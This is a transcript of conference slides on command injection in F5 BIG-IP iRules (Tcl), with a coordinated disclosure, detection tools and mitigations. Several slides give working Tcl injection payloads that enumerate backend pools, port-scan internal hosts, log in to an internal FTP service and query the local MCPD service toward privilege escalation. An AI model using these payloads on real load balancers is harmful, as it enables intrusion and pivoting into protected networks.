command injection in irules loadbalancer scripts · can store and handle multiple sessions for...
TRANSCRIPT
![Page 1: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/1.jpg)
A story about how TCL interpretation works in F5 iRulesand how it can be detected or exploited
COMMAND INJECTION IN IRULES LOADBALANCER
SCRIPTS
![Page 2: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/2.jpg)
Big thanks to my fellow researchers
▪ Jesper Blomström
▪ Pasi Saarinen
▪ William Söderberg
▪ Olle Segerdahl
Twitter @kuggofficial
Big thanks to David and Aaron at F5 SIRT for a good response https://support.f5.com/csp/article/K15650046
WHOAMI AND THANKS
![Page 3: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/3.jpg)
F-SECURE IS ONE OF THE LEADING CYBER SECURITY CONSULTING PROVIDERS GLOBALLY
CLIENTS
250+Clients
THOUGHT LEADERSHIP
300+Publications &
research released
annually
ACCREDITATIONS
12Internationally
recognised
CAPABILITY
250+Technical
consultants
Security assessments
Hardware security
assessmentsRed teaming
Incident Management &
Forensics
Development programs
Audit & analysisCoaching & exercises
Intelligence platform
Intelligence services
TECHNICAL SECURITY SERVICES
RISK & SECURITY MANAGEMENT
CYBER INTELLIGENCE
![Page 4: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/4.jpg)
LOAD BALANCERS
![Page 5: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/5.jpg)
▪ Can store and handle multiple sessions for backend servers
▪ Customers write their own iRules to define the load balancer behaviour
▪ https://devcentral.f5.com is used as a ”stackoverflow for iRules”
▪ Application fluency for all major protocols.
▪ Highly programmable through iRules, iRules LX and Traffic Policies
▪ Deployable as software and hardware
▪ Scalable to Tb/s of performance and highly available for both data and control plane
▪ WAF functionality
THE F5 PRODUCTSI WILLTALK ABOUT
Internet
HTTP Server 2
BIG-IP Load balancer
HTTP Server 1
TLS
![Page 6: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/6.jpg)
CACHING IRULEEXAMPLE
Browser LoadbalancerBackend
webservers
GET /favicon.ico
iRule
HTTP 200 OK
![Page 7: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/7.jpg)
FORWARDINGEXAMPLE
Browser LoadbalancerBackend
webservers
GET /index.html
iRule
HTTP 200 OK
GET /index.html
HTTP 200 OK
![Page 8: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/8.jpg)
▪ A fork of TCL 8.4
▪ New features in TCL >8.4 are not introduced in iRule
▪ iRule has introduced a group ofsimplifications and exceptions to TCL
▪ Return oriented programming (withoptional exception handling)
THE IRULELANGUAGE
![Page 9: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/9.jpg)
▪ iRules determine where a given HTTP request is forwarded to, based on a programmed logic
▪ The HTTP request header and body is parsed by the F5 iRule engine
▪ The system admnistrator writes F5 iRule code to handle requests
▪ Example ”catch-all” redirect iRule:
TCL/ IRULEBASICS
when HTTP_REQUEST {
HTTP::redirect ”/helloworld.html”
}
![Page 10: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/10.jpg)
HTTP header include
▪ Server: BigIP
Found in redirects
Found in favicon.ico responses
HOWTO SPOT THESELOADBALANCERSIN THE WILD
HTTP/1.0 302 Found
Location: /helloworld.html
Server: BigIP
Connection: close
Content-Type: Text/html
Content-Length: 0
![Page 11: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/11.jpg)
![Page 12: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/12.jpg)
TCLSUPPORTS ARGUMENT SUBSTITUTION
![Page 13: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/13.jpg)
▪ An argument is evaluated by breaking down words and substituting its meaning depending on the string enclosure
COMMANDARGUMENTS
1. command ”$arg1” ”$arg2” # Quoted arguments
2. command [$arg1] [$arg2] # Bracketed arguments
3. command {$arg1} {$arg2} # Braced arguments
4. command $arg1 $arg2 # Unquoted arguments
![Page 14: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/14.jpg)
Inside double quotes (”): ”Command
substitution, variable substitution, and
backslash substitution are performed on
the characters between the quotes …”
Inside brackets []: ”If a word contains an
open bracket (“[”) then TCL performs
command substitution.”
▪ Like backticks ` in /bin/sh
QUOTEDEVALUATIONAND COMMANDSUBSTITUTION
![Page 15: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/15.jpg)
Bart: Is Al there?Moe: Al?Bart: Yeah, Al. Last name Caholic?Moe: Hold on, I'll check. Phone call for Al... Al Caholic. Is there an Al Caholic here?(The guys in the pub cheer.)
THISIS A COMMANDINJECTION
15
![Page 16: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/16.jpg)
The body part of command invocation is a list of commands to execute if a condition is met
In these cases the value of $body will be command substituted regardless ofquote unless braces are used
ARGS AND BODYUNQUOTEDCOMMANDSUBSTITUTION
command ?arg? ?body?
1. after 1 $body
2. while 1 $body
3. if 1 $body
4. switch 1 1 $body
![Page 17: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/17.jpg)
TCL will expand the value of a command before assignment if it is put inside quotes
https://wiki.tcl-lang.org/page/Injection+Attack
set variable {This is a string}
catch "puts $variable"
When double quotes are used, TCL will substitute the content of the variables and commands
Try:
set variable {[error PWNED!]}
When the contents of $variable is substituted by TCL it will be passed as [error PWNED!]
to catch and executed. This is called double substitution
PRIOR ART: COMMANDINJECTIONIN TCL8.4
![Page 18: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/18.jpg)
1. The word catch is resolved as a command with a ?body?argument
2. Arguments are evaluated by the TCL interpreter according to the dodecalogue, includingexpansion of [ ] ” ”{ }
3. Any code within arguments starting with [ will be executedby catch
BREAKINGDOWN EXECUTION
catch ”puts $variable”
catch puts [error PWNED!]
error PWNED!
![Page 19: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/19.jpg)
▪ after
▪ catch
▪ eval
▪ expr
▪ for
▪ foreach
▪ history
▪ if
▪ proc
▪ cpu
▪ string match
▪ interp
▪ namespace eval
▪ namespace inscope
▪ source
▪ switch
▪ subst
▪ time
▪ try
▪ uplevel
▪ while
▪ trace
▪ list
LIST OFBUILT-IN COMMANDSTHATCANPERFORMCOMMANDEVALUATION
![Page 20: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/20.jpg)
DIRECTEVALUATION: EVAL, SUBSTOR EXPR
subst - Performbackslash, command, and variablesubstitutions.
subst ?-
nobackslashes? ?-
nocommands? ?-
novariables?
String
eval, a built-in Tcl command, interprets its arguments as a script, which it thenevaluates.
eval arg ?arg ...?
expr, a built-in Tcl command, interprets its arguments as a mathematicalexpression, which it thenevaluates.
expr arg ?arg
...?
![Page 21: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/21.jpg)
IRULEBASEDON HSSR
Browser LoadbalancerBackend
webservers
GET /index.html
iRule
HTTP 200 OK
GET /index.html
HTTP 200 OK
when HTTP_REQUEST {if {[HTTP::uri] starts_with "/index.html"} { set lang [HTTP::header {Accept-Language}]set uri http://$lang.cdn.example.com/index.htmlset status [call /Common/HSSR::http_req -uri $uri]
}}
![Page 22: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/22.jpg)
HOWHSSR USESOUR$URI
![Page 23: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/23.jpg)
1. Identify an input field that is command substituted in iRule
Input Tcl strings in fields and headernames
Look for indications that the code wasexecuted
2. Test injection location using the info command
3. Identify external resources to pivot to permanent access
EXPLOITATION
![Page 24: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/24.jpg)
DEMO TIME
![Page 25: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/25.jpg)
How do we get persistent access?
TAKING IT FURTHER
![Page 26: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/26.jpg)
GAININGPERMANENT
ACCESS USING”TABLE”
▪ A session table is a distributedand replicated key value store
▪ Commonly used to store cookie values
Notably used to avoid paying for the APM module
▪ Magically synchronized betweeninstances using load balancing
Can be used to pivot access on multiple instances
![Page 27: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/27.jpg)
HACKING THE SESSION TABLE
▪ With command injection it’spossible to overwrite any table value
▪ table set
▪ table lookup
▪ table add
▪ table replace
▪ Overwriting another (or all) usersession enable specificallyexecuting code for a target user
▪ Possible to sniff all http(s) traffic for any authenticated user
![Page 28: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/28.jpg)
TABLE DEMO: HOSTED MITM
![Page 29: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/29.jpg)
A LOOK AT THE CODEIN THE BIG-IP EDITOR
![Page 30: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/30.jpg)
POST EXPLOITATIONPOSSIBILITIES
▪ Scan internal network
▪ Scan localhost
▪ Attack internal resources usingthe BIG-IP F5 as a pivot
![Page 31: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/31.jpg)
Exposing the pool (backend) servers
active_nodes -list [LB::server pool]
PAYLOAD1
![Page 32: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/32.jpg)
PORTSCANTHE POOL SERVERS
foreach p {21 80 135 389 443 445}{catch {set c [connect192.168.200.5:$p];append r $p "\topen\n";close $c}};TCP::respond $r
![Page 33: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/33.jpg)
LOGGINGIN TO THE FTP SERVICE
catch {set c [connect 192.168.200.5:21];recv -timeout 200 $c d;recv -timeout 200 $c d;send -timeout 200 $c "USER anonymous\r";recv -timeout 200 $c d;send -timeout 200 $c "PASS [email protected]\r";recv -timeout 200 $c d;};
close $c;TCP::respond $d
![Page 34: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/34.jpg)
ATTACK CHAIN
Browser LoadbalancerProtected
webservers
GET / index.html
iRule
230 User logged in.
FTP request
FTP response
![Page 35: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/35.jpg)
PAYLOAD2PORTSCANLOCALHOST
![Page 36: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/36.jpg)
PAYLOAD3 QUERY ALL MCPDSYSTEM MODULE
set c [connect 127.0.0.1:6666];send $c {%00%00%00%16%00%00%00%3f%00%00%00%00%00%00%00%02%0b%65%00%0d%00%00%00%0c%21%e0%00%0d%00%00%00%02%00%00%00%00%00%00};recv -timeout 10000 $c d;TCP::respond $d
![Page 37: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/37.jpg)
MCPD EXPLANATION
%00%00%00%16 SIZE
%00%00%00%3f SEQUENCE
%00%00%00%00 REQUEST-ID
%00%00%00%02 FLAG
%0b%65 KEY (Query All)
%00%0d TYPE
%00%00%00%0c ATTRIBUTE SIZE
%21%e0 ATTRIBUTE NAME (System Module)
%00%0d%00%00%00%02%00%00%00%00 (Attribute data)
%00%00 END OF MESSAGE
![Page 38: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/38.jpg)
LIST USERSAND PRIVILEGES
![Page 39: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/39.jpg)
LIST LOCALTMSHSHELLCOMMANDS(BEYONDIRULE)
![Page 40: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/40.jpg)
1. iRule injection access
2. Query MCPD
3. Mcpd response
4. Execute MCPD tmsh command withTcl injection
5. …
6. Local privilegies
ATTACK CHAIN
![Page 41: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/41.jpg)
DETECTION
![Page 42: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/42.jpg)
SCANNING FOR COMMANDINJECTION
WITH TCLSCAN
▪ Automated tool to find quoted and unquoted arguments
▪ It’s unmaintained Rust so I had to fix it
▪ Finds 80% of known injectionvulnerabilities
▪ Get the code: https://github.com/kugg/tclscan
![Page 43: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/43.jpg)
▪ Automated iRule injection detector scanner for Burp Suite
▪ The tool will substitute every available input field with a Tcl injection and measure the result
▪ Download iruledetector.py in the bapp-store
AUTOMATEDTESTINGUSINGIRULEDETECTOR.PY
![Page 44: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/44.jpg)
UNIT TESTINGIRULE CODE
USING TESTCL
▪ Get the code: https://github.com/landro/testcl
▪ Unit testing framework for iRulecode
▪ Community driven, lacks complexsupport
▪ I added cookie support
▪ Good for unit testing code and finding logical vulnerabilities
![Page 45: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/45.jpg)
▪ Tcl is an old and loosely definedlanguage
Easy to fool
Hard to get variable assignment and substitution right
▪ Avoid the use of eval, subst and expr
▪ Take care to use {bracing} of ?body?arguments.
▪ Use iruledetector.py in burp to findvulnerabilities
▪ Use tclscan to review code
▪ Use testcl to test your iRule logic
▪ Do manual third party code reviews
SUMMARY
![Page 46: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/46.jpg)
THANK YOU
![Page 47: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · Can store and handle multiple sessions for backend servers Customers write their own iRules to define the load balancer behaviour](https://reader036.vdocuments.us/reader036/viewer/2022070617/5e08bc6b9d007a1461435ca3/html5/thumbnails/47.jpg)
1. iRule injection access
2. Query MCPD
3. Mcpd response
4. Execute MCPD tmsh command withTcl injection
5. …
6. Local privilegies
ATTACK CHAIN
Browser Loadbalancer
1. iRule injection (mcpd)
iRule
iRule
3. mcpd response
4. Irule with tmsh
5. Tcl shell response
2. mcpd
query